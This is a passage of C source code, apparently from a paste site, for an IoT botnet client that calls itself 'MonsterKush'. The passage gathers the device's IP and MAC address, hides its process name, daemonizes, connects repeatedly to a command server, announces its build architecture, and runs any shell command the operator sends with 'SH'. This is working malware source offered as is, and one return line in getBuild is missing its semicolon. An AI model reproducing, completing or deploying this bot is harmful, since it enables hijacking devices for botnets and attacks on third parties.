  1720. if(err == -1) return 0;
  1721.  
  1722. struct sockaddr_in name;
  1723. socklen_t namelen = sizeof(name);
  1724. err = getsockname(sock, (struct sockaddr*) &name, &namelen);
  1725. if(err == -1) return 0;
  1726. ourIP.s_addr = name.sin_addr.s_addr;
  1727. int cmdline = open("/proc/net/route", O_RDONLY);
  1728.  
  1729. char linebuf[4096];
  1730. while(fdgets(linebuf, 4096, cmdline) != NULL)
  1731. {
  1732. if(strstr(linebuf, "\t00000000\t") != NULL)
  1733. {
  1734. unsigned char *pos = linebuf;
  1735. while(*pos != '\t') pos++;
  1736. *pos = 0;
  1737. break;
  1738. }
  1739. memset(linebuf, 0, 4096);
  1740. }
  1741. close(cmdline);
  1742.  
  1743. if(*linebuf)
  1744. {
  1745. int i;
  1746. struct ifreq ifr;
  1747. strcpy(ifr.ifr_name, linebuf);
  1748. ioctl(sock, SIOCGIFHWADDR, &ifr);
  1749. for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
  1750. }
  1751. close(sock);
  1752. }
  1753.  
  1754.  
  1755. char *getBuild()
  1756. {
  1757. #if defined(__x86_64__) || defined(_M_X64)
  1758. return "x86_64";
  1759. #elif defined(__i386) || defined(_M_IX86)
  1760. return "x86_32";
  1761. #elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T)
  1762. return "ARM-4";
  1763. #elif defined(__ARM_ARCH_5__) || defined(__ARM_ARCH_5E__)
  1764. return "ARM-5"
  1765. #elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6T2__)
  1766. return "ARM-6";
  1767. #elif defined(_mips__mips) || defined(__mips) || defined(__MIPS__) || defined(_mips_)
  1768. return "MIPS";
  1769. #elif defined(__sh__)
  1770. return "SUPERH";
  1771. #elif defined(__powerpc) || defined(__powerpc__) || defined(_ppc__) || defined(__PPC__) || defined(_ARCH_PPC)
  1772. return "POWERPC";
  1773. #else
  1774. return "UNKNOWN";
  1775. #endif
  1776. }
  1777.  
  1778.  
  1779.  
  1780.  
  1781. int main(int argc, unsigned char *argv[])
  1782. {
  1783. char *mynameis = "";
  1784. if(SERVER_LIST_SIZE <= 0) return 0;
  1785.  
  1786. strncpy(argv[0],"",strlen(argv[0]));
  1787. argv[0] = "";
  1788. prctl(PR_SET_NAME, (unsigned long) mynameis, 0, 0, 0);
  1789. srand(time(NULL) ^ getpid());
  1790. init_rand(time(NULL) ^ getpid());
  1791. pid_t pid1;
  1792. pid_t pid2;
  1793. int status;
  1794.  
  1795. getOurIP();
  1796. if (pid1 = fork())
  1797. {
  1798. waitpid(pid1, &status, 0);
  1799. exit(0);
  1800. }
  1801. else if (!pid1)
  1802. {
  1803. if (pid2 = fork())
  1804. {
  1805. exit(0);
  1806. }
  1807. }
  1808.  
  1809. setsid();
  1810. chdir("/");
  1811. signal(SIGPIPE, SIG_IGN);
  1812.  
  1813. while(1)
  1814. {
  1815. if(initConnection())
  1816. {
  1817. sleep(5);
  1818. continue;
  1819. }
  1820. sockprintf(mainCommSock, "MonsterKush Initialized. || Build: %s", getBuild());
  1821. char commBuf[4096];
  1822. int got = 0;
  1823. int i = 0;
  1824. while((got = recvLine(mainCommSock, commBuf, 4096)) != -1)
  1825. {
  1826. for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0)
  1827. {
  1828. unsigned int *newpids, on;
  1829. for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
  1830. pids[on - 1] = 0;
  1831. numpids--;
  1832. newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
  1833. for (on = 0; on < numpids; on++) newpids[on] = pids[on];
  1834. free(pids);
  1835. pids = newpids;
  1836. }
  1837.  
  1838. commBuf[got] = 0x00;
  1839. trim(commBuf);
  1840.  
  1841. if(strstr(commBuf, "PING") == commBuf)
  1842. {
  1843. sockprintf(mainCommSock, "PONG");
  1844. continue;
  1845. }
  1846.  
  1847. if(strstr(commBuf, "DUP") == commBuf) exit(0);
  1848. unsigned char *message = commBuf;
  1849. if(*message == '!')
  1850. {
  1851. unsigned char *nickMask = message + 1;
  1852. while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
  1853. if(*nickMask == 0x00) continue;
  1854. *(nickMask) = 0x00;
  1855. nickMask = message + 1;
  1856. message = message + strlen(nickMask) + 2;
  1857. while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
  1858. unsigned char *command = message;
  1859. while(*message != ' ' && *message != 0x00) message++;
  1860. *message = 0x00;
  1861. message++;
  1862. unsigned char *tmpcommand = command;
  1863. while(*tmpcommand)
  1864. {
  1865. *tmpcommand = toupper(*tmpcommand);
  1866. tmpcommand++;
  1867. }
  1868. if(strcmp(command, "SH") == 0)
  1869. {
  1870. unsigned char buf[1024];
  1871. int command;
  1872. if (listFork()) continue;
  1873. memset(buf, 0, 1024);
  1874. szprintf(buf, "%s 2>&1", message);
  1875. command = fdpopen(buf, "r");
  1876. while(fdgets(buf, 1024, command) != NULL)
  1877. {
  1878. trim(buf);
  1879. memset(buf, 0, 1024);
  1880. sleep(1);
  1881. }
  1882. fdpclose(command);
  1883. exit(0);
  1884. }
  1885.  
  1886. unsigned char *params[10];
  1887. int paramsCount = 1;
  1888. unsigned char *pch = strtok(message, " ");
  1889. params[0] = command;
  1890.  
  1891. while(pch)
  1892. {
  1893. if(*pch != '\n')
  1894. {
  1895. params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
  1896. memset(params[paramsCount], 0, strlen(pch) + 1);
  1897. strcpy(params[paramsCount], pch);
  1898. paramsCount++;
  1899. }
  1900. pch = strtok(NULL, " ");
  1901. }
  1902.  
  1903. processCmd(paramsCount, params);
  1904. if(paramsCount > 1)
  1905. {
  1906. int q = 1;
  1907. for(q = 1; q < paramsCount; q++)
  1908. {
  1909. free(params[q]);
  1910. }
  1911. }
  1912. }
  1913. }
  1914. }
  1915. return 0;
  1916. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement